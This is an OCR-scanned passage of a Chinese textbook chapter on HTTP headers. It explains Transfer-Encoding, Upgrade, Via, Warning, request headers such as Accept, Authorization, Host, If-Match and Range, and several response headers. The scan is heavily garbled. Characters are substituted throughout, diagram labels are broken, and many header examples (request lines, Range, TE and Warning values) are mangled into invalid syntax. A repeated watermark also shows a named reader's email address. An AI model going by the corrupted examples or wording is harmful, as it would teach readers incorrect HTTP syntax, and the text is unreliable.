Transfer-Encoding: chunked 


=== 
= 


客户 端 服务 器 





首部 字段 Transfer-Encoding 规定 了 传输 报 文 主体 时 采用 的 编码 
pi 
HTTP/1.1 的 传输 编码 方式 仅 对 分 块 传输 编码 有 效 。 





WE AGOR 

Date: Tue, 03 Jul 2012 04:40:56 GMT 
Cache-Control: public, max-age=604800 
Content-Type: text/javascript; charset=utf-8 
ESeleams eS 0040 560 eME 
X-Frame-Options: DENY 

X-XSS-Protection: 1; mode=block 

Comsemnse Eee za 
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Transfer-Encoding: chunked 


Ce 

CE ee 
.3312 字 市 分 块 数据 .…- 

292 1T6 HI(Ton 2 4) 
.914 字 节 分 块 数据 .…… 


0 


以 上 用 例 中 ， 正 如 在 首部 字段 Transfer-Encoding 中 指定 的 那样 ， 有 
鸡 使 用 分 块 传输 编码 ， 且 分 别 被 分 成 3312 字 市 和 914 字 市 大 小 的 分 块 
数据 。 





6.3.7 Upgrade 
首部 字段 Upgrade 用 于 检测 HTTP 协议 及 其 他 协议 是 否 可 使 用 更 高 
的 版 本 进行 通信 ， 其 参数 值 可 以 用 来 指定 一 个 完全 不 同 的 通信 协议 。 








能 让 我 使 用 这 个 协议 3? 


Ei /indeasx, nem Errme/1.1 
Upgrade: TLS/1.0 
Connection: Upgrade 





Fey/ lS ere os 
客户 疡 Voorade "Tie /1 0 Ee/ IST 
Connection: Upgrade 





上 图 用 例 中 ， 首 部 字段 Upgrade 指定 的 值 为 TLS/1.0。 请 注意 此 处 
两 个 字段 首部 字段 的 对 应 关系，Connection 的 值 被 指定 为 Upgrade。 
Upgrade 首部 字段 产生 作用 的 Upgrade 对象 仅 限 于 客户 端 和 邻接 服务 需 
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er 


之 间 。 因 此 ， 使 用 首部 字段 Upgrade 时 ， 还 需要 额外 指定 Connection: 
Upgrade。 

对 于 附 有 首部 字段 Upgrade 的 请 求 ， 服 务 大 可 用 101 Switching 
Protocols 状态 码 作 为 啊 应 返回 。 














6.3.8 Via 
使 用 首部 字段 Via 是 为 了 退 踩 客户 喘 与 服务 带 之 间 的 请 求 和 响应 报 
文 的 传输 路 径 。 


报 文 经 过 代理 或 网 关 时 ， 会 先 在 首部 字段 Via 中 附加 该 服务 器 的 信 
息 ， 然 后 再 进行 转发 。 这 个 做 法 和 traceroute 及 电子 邮件 的 Received 首 
部 的 工作 机 制 很 类 似 。 

首部 字段 Via 不 仅 用 于 追踪 报 文 的 转发 ， 还 可 避免 请 求 回 环 的 发 


生 。 所 以 必须 在 经 过 代理 时 附加 该 首部 字段 内 容 。 
098 







1) REE 


©O) enmy Crome I 
Va OP ool 


9 9 Er rr sg z 
Wh VI or ow na end 
Tm om eo 






人 
代理 服务 器 B ss 






各 个 代理 服务 器 会 往 Via 首部 添加 自 
号 服务 器 的 信息 。 源 服 务 器 











上 图 用 例 中 ， 在 经 过 代理 服务 需 A 时 ，Via 首部 附加 了 “1.0 gw. 
hackrjp (Squid/3.1)” 这 样 的 字符 串 值 。 行头 的 1.0 是 指 接收 请 求 的 服务 
器 上 应 用 的 HITP 协议 版 本 。 接 下 来 经 过 代理 服务 器 B 时 亦 是 如 此 ， 
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在 Via 首部 附加 服务 需 信 息 ， 也 可 增加 1 个 新 的 Via 首部 写 入 服务 天 
信息 。 

Via 首部 是 为 了 追踪 传输 路 径 ， 所 以 经 常会 和 TRACE 方法 一 起 使 
用 。 比 如 ,代理 服务 器 接收 到 由 TRACE 方法 发 送 过 来 的 请 求 (其 中 
Max-Forwards: 0 ) 时 ， 代 理 服 务 需 ee 这 种 情 
况 下 ， 代 理 服务 硕 会 将 目 身 的 信息 附加 到 Via 首部 后 ， 返 回 该 请 求 的 
吧 应 。 





6.3.9 Warning 


HTTP/1.1 的 Warning 首部 是 从 HTTP/1.0 的 啊 应 首部 ( Retry-After ) 
货 变 过 来 的 。 该 首部 通 笛 会 告知 用 户 一 些 与 缓存 相关 的 问题 的 警告 。 





Warning: 113 gw.hackr.jp:8080 "Heuristic expiration" Tue, 03 Uul SS 
O20 0 :09 -440EME 


Warning 首部 的 格式 如 下 。 最 后 的 日 期 时 间 部 分 可 省 略 。 


We hal, 





HTTP/1.1 中 定义 了 7 种 警告 。 警告 码 对 应 的 警告 内 容 仪 推荐 参考 。 
另外 ， 警 告 码 具备 扩展 性 ， 今 后 有 可 能 追加 新 的 警告 码 。 





O) 


表 6-7: HTTP/1.1 警告 码 


警告 内 容 说 明 
110 | Response is stale ( 响应 已 过 期 ) 代理 返回 已 过 期 的 资源 
Revalidation failed ( 再 验证 失败 ) 代理 再 验证 资源 有 效 性 时 失败 ( 服务 





器 无 法 到 达 等 原因 ) 


Disconnection operation ( 断 开 连 接 ”| 代理 与 互联 网 连接 被 故意 切断 
操作 ) 
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Heuristic expiration ( 试探 性 过 期 ) 响应 的 使 用 期 超过 24 小 时 ( 有 效 缓存 


的 设 定时 间 大 于 24 小 时 的 情况 下 ) 
Miscellaneous warning ( 杂项 警告 ) | 任意 的 警告 内 容 


Transformation applied ( 使 用 了 转换 ) | 代理 对 内 容 编码 或 媒体 类 型 等 执行 了 
某 些 处 理 时 





Miscellaneous persistent warning 任意 的 警告 内 容 
( 持久 杂项 警告 ) 








6.4 ”请 求 首部 字段 
请 求 首 部 字段 是 从 客户 端 往 服务 器 端 发 送 请 求 报 文中 所 使 用 的 字 
段 ， 用 于 补充 请 求 的 附加 信息 、 客 户 端 信息 、 对 响应 内 容 相关 的 优先 级 
100 等 内 容 。 





















我 村 发 送 过 来 3 喷 


: HTTP 请 求 报 文 中 使 用 的 首部 字段 
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6.4.1 Accept 










那 份 资产 景 好 发 给 我 HTML 
格式 的 ， 如 果 没 有 ， 发 给 我 


TEXT 略 式 的 也 行 啊 
ea ee ae 0 ee 


-使 = HTML 格式 
客户 端 
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 










HTML 格式 TEXT 格 式 








Accept 首部 字段 可 通知 服务 禹 ， 用 户 代理 能 够 处 理 的 媒体 类 型 及 媒 
体 类 型 的 相对 优先 级 。 可 使 用 type/subtype 这 种 形式 ， 一 次 指定 多 种 媒 
体 类 型 。 

下 面 我 们 试 举 几 个 媒体 类 型 的 例子 。 


e 文本 文件 
text/html, text/plain, text/css ... 
application/xhtml+xml, application/xm!l ... 
e 图 片 文件 
Image/]peg, Image/gl Image/png .… 
e 视频 文件 
video/mpeg, video/quicktime ... 
e@ 应 用 程序 使 用 的 二 进 制 文件 


application/octet-stream, application/zip ... 


比如 ， 如 果 浏 览 大 不 支持 PNG 图 片 的 显示 ， 那 Accept 就 不 指定 
image/png， 而 指定 可 人 处理 的 image/gif 和 image/jpeg 等 图 片 类 型 。 
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| 加 


在 想 要 给 显示 的 媒体 类 型 增加 优先 级 ， 则 使 用 q= 来 额外 表示 权重 
值 ， 用 分 号 (; ) 进行 分 隔 。 权 重 值 q 的 范围 是 0~1 ( 可 精确 到 小 数 点 后 
3 位 ) 且 1 为 最 大 值 。 不 指定 权重 q 值 时 ， 移 认 权重 为 q=1.0。 

当 服 务 融 提 供 多 种 内 容 时 ， 将 会 首先 返回 权重 值 最 高 的 媒体 类 型 。 











6.4.2 Accept-Charset 






我 想 以 这 个 字 算 售 
阅读 返回 的 页 面 






Accept-Charset: iso-8859-5, 
unicode-1-1;q=0.8 





Ws 字符 集 
ISO-8859-5 


Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 

















Accept-Charset 首部 字段 可 用 来 通知 服务 希 用 户 代理 文 持 的 字符 集 
及 字符 集 的 相对 优先 顺序 。 另 外 ， 可 一 次 性 指定 多 种 字符 集 。 与 首部 字 
段 Accept 相同 的 是 可 用 权重 q 值 来 表示 相对 优先 级 。 

该 首部 字段 应 用 于 内 容 协商 机 制 的 服务 硕 驱 动 协商 。 











(DD 原文 是 “品质 爷 数 ”。 在 RFC2616 定 义 中 ， 此 处 的 q 是 指 qvalue， 即 quality 
factor。 直 译 的 话 就 是 质量 数 , 但 经 过 综合 考虑 理解 记忆 的 便利 性 后 , 似乎 采 
用 权重 值 更 为 稳妥 。 译 者 注 
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6.4.3 Accept-Encoding 





报 文 主体 补 压 缩 也 
没关系 的 


Accept-Encoding: gzip, deflate 





Accept-Encoding 首部 字段 用 来 告知 服务 套用 户 代 理 文 持 的 内 容 编 
人 码 及 内 容 编 码 的 优先 级 顺序 。 可 一 次 性 指定 多 种 内 容 编 码 。 
下 面试 举 出 几 个 内 容 编 码 的 例子 。 


® gzip 
由 文件 压缩 程序 gzip ( GNU zip ) 生成 的 编码 格式 ( RFC1952 )， 
采用 Lempel-Ziv 算法 (LZ77) 及 32 位 循环 见 余 校 验 (Cyclic 
Redundancy Check， 通 称 CRC )。 

@ compress 
由 UNIX 文件 压缩 程序 compress 生成 的 编码 格式 ， 采 用 Lempel- 
Ziv-Welch 算法 (LZW )。 

@ deflate 
组 合 使 用 zlib 格式 (RFC1950 ) 及 由 deflate 压缩 算法 (RFC1951 ) 
生成 的 编码 格式 。 
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EARL 


® identity 
不 执行 压缩 或 不 会 变化 的 于 认 编 码 格式 





采用 权重 q 值 来 表示 相对 优先 级 ， 这 点 与 首部 字段 Accept 相同 。 
为 外 ， 也 可 使 用 星 写 (* ) 作为 通配符 ， 指 定 任 意 的 编码 格式 。 


6.4.4 Accept-Language 
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eeepbesnmanguags zh enpzh:a=007/ en vs ene=008 





首部 字段 Accept-Language 用 来 告知 服务 硕 用 户 代理 能 够 处 理 的 目 

然 声言 集 〈 指 中 文 或 英文 等 )， 以 及 目 然 语言 集 的 相对 优先 级 。 可 一 次 
指定 多 种 目 然 语言 集 。 

和 Accept 首部 字段 一 样 ， 按 权重 值 q 来 表示 相对 优先 级 。 在 上 述 
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图 例 中 ， 客 户 问 在 服务 融 有 中 文 版 资源 的 情况 下 ， 会 请 求 其 返回 中 文 版 


对 应 的 啊 应 ， 没 有 中 文 版 时 ， 则 请 求 返 回 喘 文 版 啊 应 。 


6.4.5 Authorization 


WWW-Authenticate 










该 页 面 需要 HTTP 认证 ， 


GET /ingex nen 把 你 的 认证 信息 发 给 我 


= 





A Oa ze 
WWW=AUthenticate: pasic 服务 器 


客户 站 







来 ， 我 把 认证 信息 
发 送 给 你 


ET/ el en 
enor za On as WS NI WY NZ ON AA 


DUO 


Authorization: Basic dWVub3N1lbjpwYXNzd29yZA== 








首部 字段 Authorization 是 用 来 告知 服务 硕 ， 用 户 代 理 的 认证 信息 
(证 书 值 )。 通 党 ， 想 要 通过 服务 需 认 证 的 用 户 代 理会 在 接收 到 返回 
的 401 状态 码 啊 应 后 ， 把 首部 字段 Authorization 加 入 请 求 中 。 共 


用 缓存 在 接收 到 含有 Authorization 首部 字段 的 请 求 时 的 操作 处 理会 
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mu 四 四 


略 有 差异 。 
有 关 HTTP 访问 认证 及 Authorization 首部 字段 ， 稍 后 的 章 闻 还 会 详 
细 说 明 。 另 外 ， 读 者 也 可 参阅 RFC2616。 





6.4.6 Expect 


保 能 做 到 这 个 o 吗 ? 


我 只 能 做 到 1oo Continue 





EXPect: 100-continue 


客户 端 使 用 首部 字段 Expect 来 告知 服务 器 ， 期 望 出 现 的 某 种 特定 
行为 。 因 服务 需 无 法 理解 客户 端的 期 望 作 出 回应 而 发 生 错 误 时 ， 会 返回 
状态 码 417 Expectation Failed。 

客户 端 可 以 利用 该 首部 字段 ， 写 明 所 期 望 的 扩展 。 虽 然 HTTP/1.1 
规范 只 定义 了 100-continue ( 状态 码 100 Continue 之 意 )。 

等 竺 状态 码 100 啊 应 的 客户 端 在 发 生 请 求 时 ， 需 要 指定 Expect: 


100-continue。 
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6.4.7 From 






如 果 有 事 请 联系 
这 个 电子 邮箱 


Emome Eonael 





首部 字段 From 用 来 告知 服务 天 使 用 用 户 代 理 的 用 户 的 电子 邮件 地 
址 。 通常 ， 其 使 用 日 的 就 是 为 了 显示 搜索 引擎 等 用 户 代 理 的 负责 人 的 
电子 邮件 联系 方式 。 使 用 代理 时 ， 应 尽 可 能 包含 From 首部 字段 〈 但 可 





能 会 因 代 理 不 同 ， 将 电子 邮件 地 址 记录 在 User-Agent 首部 字段 内 )。 uy 
6.4.8 Host 
ts 





虚拟 主机 


www.hackr.jp 





客户 站 


Host: www.hackr.jp 





虚拟 主机 


www.usaglidesIgn.jp 


图 : 虚拟 主机 运行 在 同一 个 IP 上 ， 因 此 使 用 首部 字段 Host 加 以 区 分 
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Host: www.hackr.jp 





首部 字段 Host 会 告知 服务 器 ， 请 求 的 资源 所 处 的 互联 网 主机 名 和 
端口 号 。Heost 首部 字段 在 HTTP/1.1 规范 内 是 唯一 一 个 必须 被 包含 在 请 
求 内 的 首部 字段 。 

首部 字段 Host 和 以 单 台 服 务 顺 分 配 多 个 域名 的 虚拟 主机 的 工作 机 
制 有 很 密切 的 关联 ， 这 是 首部 字段 Host 必须 存在 的 意义 。 

请 求 被 发 送 至 服务 器 时 ， 请 求 中 的 主机 名 会 用 IP 地 址 直接 替换 解 
决 。 但 如 果 这 时 ， 相 同 的 卫 地 址 下 部 署 运 行 着 多 个 域名 ， 那 么 服务 器 
就 会 无 法 理解 究竟 是 哪个 域名 对 应 的 请 求 。 因 此 ， 就 需要 使 用 首部 字段 
Host 来 明确 指出 请 求 的 主机 名 。 知 服务 器 未 设 定 主机 名 ， 那 直接 发 送 一 
个 空 值 即 可 。 如 下 所 示 。 
































HOSEe: 


6.4.9 If-Match 


If-Match 
If-Modified-Since 

上 f-None-Match 
If-Range 
If-Unmodified-Since 









如 果 你 能 符合 条 件 ， 我 
就 会 接受 你 的 请 求 


: 附 市 条 件 请 求 
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形 如 If-xxx 这 种 样式 的 请 求 首 部 字段 ， 都 可 称 为 条 件 请 求 。 服 
务 器 接收 到 附带 条 件 的 请 求 后 ， 只 有 判断 指定 条 件 为 真 时 ， 才 会 执行 
请 求 。 





GET /index.html 
工 生 三 愉 司 让 人 有 2 工 过 了 处 三 了 1 站 


> 
Index.htm| 


实体 标记 ( ETag ) 
123456 








实体 标记 ( ETag ) 是 与 特定 资源 关联 的 
确定 值 。 资 源 更 新 后 ETag 也 会 随 之 更 新 


GH /1108 .men 
Mae ene A 


= 二 加 Index.htm| 


流体 祭 记 有 ET ll 
服务 567890 





412 Precondition Failed 


图 : 只 有 当 If-Match 的 字段 值 跟 ETag 值 匹配 一 致 时 ， 服 务 器 才 会 接受 请 求 


I Mealsemn nn 2s 





首部 字段 人 Match， 属 附 刘 条件 之 一 ， 它 会 告知 服务 硕 匹 配 资 源 所 
用 的 实体 标记 (ETag ) 值 。 这 时 的 服务 需 无 法 使 用 弱 ETag 值 。( 请 参 
照 本 草 有 关 首 部 字段 ETag 的 说 明 ) 

服务 融会 比 对 下 Match 的 字段 值 和 资源 的 ETag 值 ， 仅 当 两 者 一 致 
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由 


国 国 加 


时 ， 才 会 执行 请 求 。 反 之 ， 则 返回 状态 公 412 Precondition Failed 的 啊 应 。 
还 可 以 使 用 星 号 (* ) 指定 If-Match 的 字段 值 。 针 对 这 种 情况 ， 服 
务 希 将 会 忽略 ETag 的 值 ， 只 要 资源 存在 就 处 理 请 求 。 





6.4.10 If-Modified-Since 


GET /index.htm 
If-Modified-Since: Thu, 15 Apr 2004 00:00:00 GMT 











因为 明 在 2004 年 4 月 
1 日 之 后 更 新 过 的 次 
源 ， 所 以 我 可 以 接 骂 









000mOkK 
Last-Modified: Sun, 29 Aug 2004 14:03:05 GMT 


GET /index.htm 
If-Modified-Since: Thu, 15 Apr 2004 00:00:00 GMT 





这 份 资源 在 2004 年 4 月 
情 日 之 后 未 更 新 过 ， 所 
以 我 不 能 接受 









客户 端 服务 器 


304 Not Modified 


图 : 如 果 在 If-Modified-Since 字段 指定 的 日 期 时 间 后 ， 资 源 发 生 了 更 新 ， 服 务 
器 会 接受 请 求 


If-Modified-Since: Thu, 15 Ap 2004 00:00:00 GMT 





首部 字段 和 全 Modified-Since， 属 附 审 条 件 之 一 ， 它 会 告知 服务 需 看 
If-Modified-Since 字段 值 早 于 资源 的 更 新 时 间 ， 则 和 希望 能 处 理 该 请 求 。 
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而 在 指定 IModified-Since 字段 值 的 日 期 时 间 之 后 ， 如 果 请 求 的 资源 都 


没有 过 更 新 ， 则 返回 状态 码 304 Not Modified 的 响应 。 





If-Modified-Since 用 于 确认 代理 或 客户 端 拥 有 的 本 地 资源 的 有 效 








性 。 获 取 资 源 的 更 新 日 期 时 间 ， 可 通过 确认 首部 字段 Last-Modified 来 
确定 。 


6.4.11 lIf-None-Match 









PUT /sample.html 
Noale Medel 


我 这 没有 Sample.html， 所 以 
可 以 处理 你 申请 求 


因为 资源 不 存在 ， 所 以 对 
应 的 ETag 也 不 存在 


客户 端 服务 器 
00 OK 


图 : 只 有 在 If-None-Match 的 字段 值 与 ETag 值 不 一 致 时 ， 可 处 理 该 请 求 。 
与 |f-Match 首部 字段 的 作用 相反 


首部 字段 全 None-Match 属于 附带 条 件 之 一 。 它 和 首部 字段 I 
Match 作用 相反 。 用 于 指定 下 None-Match 字段 值 的 实体 标记 ( ETag ) 
值 与 请 求 资 源 的 ETag 不 一 致 时 ， 它 丈 告 知 服务 硕 处 理 该 请 求 。 

在 GET 或 HEAD 方法 中 使 用 首部 字段 -None-Match 可 获取 最 新 
的 资源 。 因 此 ， 这 与 使 用 首部 字段 IfModified-Since 时 有 些 类 似 。 




















Min 
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or 


6.4.12 If-Range 





|f-Range 字段 值 若是 跟 ETag 值 或 更 新 的 日 期 时 间 匹 配 一 致 ， 


那么 就 作为 沁 围 请 水 处理 





Gar /1index.hneml 
LTE-Remee V23456" 
Raneles lev eels SO oO a 


> 
> : 
Or Index.htm ! 





获取 部 分 实体 标记 ( ETag ) 
Index.htm| 二 襄 和 | ”123456 ， 


206 Partial Content 
Content-Range: bytes 5001-10000/10000 
Comneene Tengten so000 


十 人 不一致 ， 则 忽略 泄 围 请 求 ， 返回 全 音 了 





112 GET /index.html 
LE-RAnee W123456W 
Ranmee :ml ees =so0R O00 


> ' 
Index.htm ! 





实体 标记 ( ETag ) 
567890 
200 ok I---------------------- 


ETag: "567890" 








首部 字段 If-Range 属于 附带 条 件 之 一 。 它 告知 服务 右 耕 指定 的 
If-Range 字段 值 ( ETag 值 或 者 时 间 ) 和 请 求 资源 的 ETag 值 或 时 间 相 一 
致 时 ， 则 作为 范围 请 求 处 理 。 反 之 ， 则 返回 全 体 资源 。 
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如 果 不 使 用 首部 字段 If-Range 则 需要 进行 两 次 处 理 








ET 
VTS 有志 人 EGG 412 Precondition Failed 
Remees:S O00 HO0000 









你 里 由 (部 分 7 次 源 已 经 没有 + 
你 重新 再 发 -个 请 求 吧 






把 利 余 曲 部 
发 给 我 





200" OK 
区 ET ETag: "567890" 





下 面 我 们 思考 一 下 不 使 用 首部 字段 If-Range 发 送 请 求 的 情况 。 服 务 
融 端的 资源 如 采 更 新 ， 那 客户 问 持 有 资源 中 的 一 部 分 也 会 随 之 无 效 ， 当 
然 ， 范围 请 求 作为 前 提 是 无 效 的 。 这 时 ， 服 务 右 会 暂且 以 状态 码 412 
Precondition Failed 作为 啊 应 返回 ， 其 目的 是 众 促 客户 端 再 次 发 送 请 求 。 
这 样 一 来 ， 与 使 用 首部 字段 If-Range 比 起 来 ， 就 需要 花费 两 倍 的 功夫 。 














6.4.13 lf-Unmodified-Since 


meena See 0000300NMeMeE 


首部 字段 IUnmodified-Since 和 首部 字段 全 Modified-Since 的 作用 
相反 。 它 的 作用 的 是 告知 服务 硕 ， 指 定 的 请 求 资 源 只 有 在 字段 值 内 指 
定 的 日 期 时 间 之 后 ， 未 发 生 更 新 的 情况 下 ， 才 能 处 理 请 求 。 如 果 在 指 
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定 日 期 时 间 后 发 生 了 更 新 ， 则 以 状态 码 412 Precondition Failed 作为 啊 
应 返回 。 


6.4.14 Max-Forwards 


只 能 再 往 下 、 
i 让 Oo Ww oo, 


Max-Forwards: 2 Max-Forwards: 1 Max-Forwards: 0 





代理 服务 器 A 代理 服务 器 B 源 服务 器 


图 : 每 次 转发 数值 减 1。 当 数值 变 0 时 返回 响应 


Max-Forwards: 10 


通过 TRACE 方法 或 OPTIONS 方法 ， 发 送 包含 首部 字段 Max- 
Forwards 的 请 求 时 ， 该 字段 以 十 进 制 整 数 形式 指定 可 经 过 的 服务 需 最 大 
数目 。 服 务 硕 在 往 下 一 个 服务 硕 转 发 请 求 之 前 ，Max-Forwards 的 值 减 
1 后 重新 赋值 。 当 服务 器 接收 到 Max-Forwards 值 为 0 的 请 求 时 ， 则 不 
再 进行 转发 ， 而 是 直接 返 回 啊 应 。 

使 用 HITP 协议 通信 时 ,请 求 可 能 会 经 过 代理 等 多 台 服 务 侣 。 途 
中 ， 如 果 代 理 服务 硕 由 于 某 些 原因 导致 请 求 转发 失败 ， 客 户 端 也 就 等 不 
到 服务 需 返 回 的 啊 应 了 。 对 此 ， 我 们 无 从 可 知 。 

可 以 灵活 使 用 首部 字段 Max-Forwards， 针 对 以 上 问题 产生 的 原因 展开 
调查 。 由 于 当 Max-Forwards 字段 值 为 0 时， 服务 右 就 会 立即 返回 响应 ， 由 
此 我 们 至 少 可 以 对 以 那 台 服务 需 为 终点 的 传输 路 径 的 通信 状 交 有 所 把 握 。 











图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 6 章 HTTP 首 部 






怎 么 不 见 响应 


:有 于 未 知 原因 
返回 呢 】 


| 
| 
导致 请 求 失败 ， 


memeey 





代理 服务 器 B 


客户 站 


图 : 代理 B 到 源 服务 器 的 请 求 失败 了 ,但 客户 端 不 知道 






怎么 不 内 响应 
返回 呢 i 






1 由 于 未 知 原因 导致 请 求 
， 陷入 循环 


图 : 由 于 未 知 原因 ， 导 致 请 求 陷 入 代理 之 间 的 循环 ， 但 客户 端 不 知道 


6.4.15 Proxy-Authorization 


Proxy-Authorization: Basic dGlwOJKkKpNLAGfFYS 


接收 到 从 代理 服务 需 发 来 的 认证 质询 时 ， 客 户 端 会 发 送 包含 首部 字 
段 Proxy-Authorization 的 请 求 ， 以 告知 服务 硕 认 证 所 需要 的 信息 。 

这 个 行为 是 与 客户 端 和 服务 硕 之 间 的 HITP 访问 认证 相 类 似 的 ， 不 
同 之 处 在 于 ， 认 证 行为 发 生 在 客户 端 与 代理 之 间 。 客 户 端 与 服务 融 之 间 
的 认证 ， 使 用 首部 字段 Authorization 可 起 到 相同 人 作用。 有关 HTTP 访问 
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ER 


认证 ， 后 面 的 章节 会 作 详尽 曾 述 。 


6.4.16 Range 


Rameer: mv es so sooo 





对 于 只 需 获 取 部 分 资源 的 范围 请 求 ， 包 含 首 部 字段 Range 即 可 告知 
服务 融资 源 的 指定 范围 。 上 面 的 示例 表示 请 求 获取 从 第 5001 字 贡 至 第 
10000 字 广 的 资源 。 

接收 到 附带 Range 首部 字段 请 求 的 服务 姻 ， 会 在 处 理 请 求 之 后 返回 
状态 码 为 206 Partial Content 的 啊 应 。 无 法 处 理 该 范围 请 求 时 ， 则 会 返 
回 状态 码 200 OK 的 啊 应 及 全 部 资源 。 











116 6.4.17 Referer 





GET 只 要 查看 Referer 就 能 知道 请 求 的 
Referer AnEEN /vi nack /index hen URI 是 从 哪个 Web 页 面 发 起 的 








Referer: http://www.hackr.jp/index.htm 





首部 字段 Referer 会 告知 服务 器 请 求 的 原始 资源 的 URI。 
客户 端 一 般 都 会 发 送 Referer 首部 字段 给 服务 器 。 但 当 直接 在 浏览 
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希 的 地 址 栏 输入 URI， 或 出 于 安全 性 的 考虑 时 ， 也 可 以 不 发 送 该 首部 
字段 。 

因为 原始 资源 的 URI 中 的 查询 字符 串 可 能 含有 ID 和 密码 等 保密 
信息 ， 要 是 写 进 Referer 转发 给 其 他 服务 硕 ， 则 有 可 能 导致 保密 信息 的 
泄露 。 

另外 ，Referer 的 正确 的 拼写 应 该 是 Referrer， 但 不 知 为 何 ， 大 家 一 
直 治 用 这 个 错误 的 拼写 。 





6.4.18 TE 


Mis Geli, OEElLaELE CSO.S 





首部 字段 TE 会 告知 服务 硕 客 户 端 能 够 处 理 啊 应 的 传输 编 但 方式 及 
相对 优先 级 。 它 和 首部 字段 Accept-Encoding 的 功能 很 相像 ， 但 是 用 于 
传输 编码 。 

首部 字段 TE 除 指定 传输 编码 之 外 ， 还 可 以 指定 伴随 trailer 字段 的 
分 块 传输 编码 的 方式 。 应 用 后 者 时 ， 只 需 把 trailers 赋值 给 该 字段 值 。 








We el 由 Le 
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er- 


6.4.19 User-Agent 


SR 





ackrap 


¢ DC Hf Ohackrip @ 


hackr 














User-Agent: Mozilla/5.0 (Windows NT 6.1; 
WOW64) AppleWebkKit/536.11 (KHTML, like 
Gecko) Chrome/20.0.1132.47 Safari/536.11 











Mozilla/5.0 (iPhone; CPU iPhone OS 5 0 like 
Mac OS X) AppleWebKit/534.46 (KHT™ML, like 
118 Gecko) Version/5.1 Mobile/9A334 








图 : User-Agent 用 于 传达 浏览 器 的 种 类 


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/ 一 
2OUOIONEOINEEONSE ESG 人 也 9 


首部 字段 User-Agent 会 将 创建 请 求 的 浏览 磺 和 用 户 代 理 名 称 等 信息 
传达 给 服务 融 。 

由 网 络 爬 虫 发 起 请 求 时 ， 有 可 能 会 在 字段 内 添加 爬虫 作者 的 电子 邮 
件 地 址 。 此 外 ， 如 果 请 求 经 过 代理 ， 那 么 中 间 也 很 可 能 被 添加 上 代理 服 
务 融 的 名 称 。 








图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 6 章 HTTP 首 部 


6.5 ”响应 首部 字段 


啊 应 首部 字段 是 由 服务 需 端 向 客户 端 返 回 啊 应 报 文 中 所 使 用 的 字 
段 ， 用 于 补充 啊 应 的 附加 信息 、 服 务 需 信息 ， 以 及 对 客户 端的 附加 要 求 
Me 
















我 怒 啊 应 发 送 过 来 
客户 端 
图 : HTTP 响应 报 文中 使 用 的 首部 字段 
6.5.1 Accept-Ranges 119 


范围 请 求 Ok 鸣 
Accept-Ranges: bytes 





图 : 当 不 能 处 理 范围 请 求 时 ，Accept-Ranges: none 


Accept-Ranges: bytes 





首部 字段 Accept-Ranges 是 用 来 告知 客户 端 服务 硕 是 否 能 处 理 范 于 
请 求 ， 以 指定 获取 服务 器 端 某 个 部 分 的 资源 。 

可 指定 的 字段 值 有 两 种 ， 可 处 理 范围 请 求 时 指定 其 为 bytes， 反 之 
则 指定 其 为 none。 
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个 绿 存 向 汶 眼 务 器 确认 
过 ， 现 已 过 去 3 10 分 钟 









源 服务 器 


oles co 


首部 字段 Age 能 告知 客户 端 ， 源 服务 器 在 多 久 前 创建 了 响应 。 字 上 段 
值 的 单位 为 秒 。 

若 创 建 该 响应 的 服务 需 是 缓存 服务 器 ，Age 值 是 指 缓存 后 的 响应 再 次 
发 起 认证 到 认证 完成 的 时 间 值 。 代 理 创建 响应 时 必须 加 上 首部 字段 Age。 








6.5.3 ETag 


、 
Index.htm 


ETag: usagi-1234 


希 一 Index.htm 
ETag: usagli-5678 


服务 












资源 更 新 
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EM ee sae 


首部 字段 ETag 能 告知 客户 端 实体 标识 。 它 是 一 种 可 将 资源 以 字符 
串 形 式 做 唯一 性 标识 的 方式 。 服 务 带 会 为 每 份 资源 分 配对 应 的 ETag 值 。 

为 外 ， 当 资源 更 新 时 ，ETag 值 也 需要 更 新 。 生 成 ETag 值 时 ， 并 没 
有 统一 的 算法 规则 ， 而 仅仅 是 由 服务 人 页 来 分 配 。 











资源 的 URI 虽然 相同 ， 
中 文 版 和 英文 版 对 应 曲 次 
= 原 是 不 同 的 
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服务 器 Emo Bcq Era T3000 cfon 


资源 被 缓存 时 ， 就 会 被 分 配 唯一 性 标识 。 例 如 ， 当 使 用 中 文 版 的 浏 
览 各 访问 http : /www.google.com/ 时 ， 就 会 返回 中 文 版 对 应 的 资源 ， 而 
使 用 英文 版 的 浏览 器 访问 时 ， 则 会 返回 英文 版 对 应 的 资源 。 两 者 的 URI 
是 相同 的 ， 所 以 仅 赁 URI 指定 缓存 的 资源 是 相当 困难 的 。 若 在 下 载 过 
程 中 出 现 连接 中 断 、 再 连接 的 情况 ， 都 会 依照 ETag 值 来 指定 资源 。 








强 ETag 值 和 弱 Tag 值 
ETag 中 有 强 ETag 值 和 弱 ETag 值 之 分 。 


强 ETag 值 
强 ETag 值 ， 不 论 实体 发 生 多 么 细微 的 变化 都 会 改变 其 值 。 





ETag: "usagi-1234" 
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弱 ETag 值 
弱 ETag 值 只 用 于 提示 资源 是 否 相同 。 只 有 资源 发 生 了 根本 改变 ，F 
生 差 异 时 才 会 改变 ETag 值 。 这 时 ， 会 在 字段 值 最 开始 处 附加 W/。 














ETagNuusagIE1 4 


6.5.4 Location 


你 要 浏览 的 页 面 已 神 
转移 ， 去 那 边 看 吧 ! 


GET /sample.htm 


I22 





服务 器 A 
www.hackr.jp 


302 Beovmo 
Location: http://www.usagidesign.jp/sample.htm 


那 我 到 那里 去 看 





GET /sample.htm 





200 OK 服务 器 B 
www.usagldesIgn.jp 


Location: http://www.usagidesign.jp/sample.html 
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使 用 首部 字段 Location 可 以 将 啊 应 接收 方 引导 至 某 个 与 请 求 URI 
位 置 不 同 的 资源 。 

基本 上 ， 该 字段 会 配合 3xx : Redirection 的 啊 应 ， 提 供 重 定 问 的 
URI, 

几乎 所 有 的 浏览 硕 在 接收 到 包含 首部 字段 Location 的 啊 应 后 ， 都 会 
强制 性 地 尝试 对 已 提示 的 重 定 问 资源 的 访问 。 


6.5.5 Proxy-Authenticate 


Proxy-Authenticate: Basic realm="Usagidesign Auth" 


首部 字段 Proxy-Authenticate 会 把 由 代理 服务 硕 所 要 求 的 认证 信息 
发 送 给 客户 端 。 

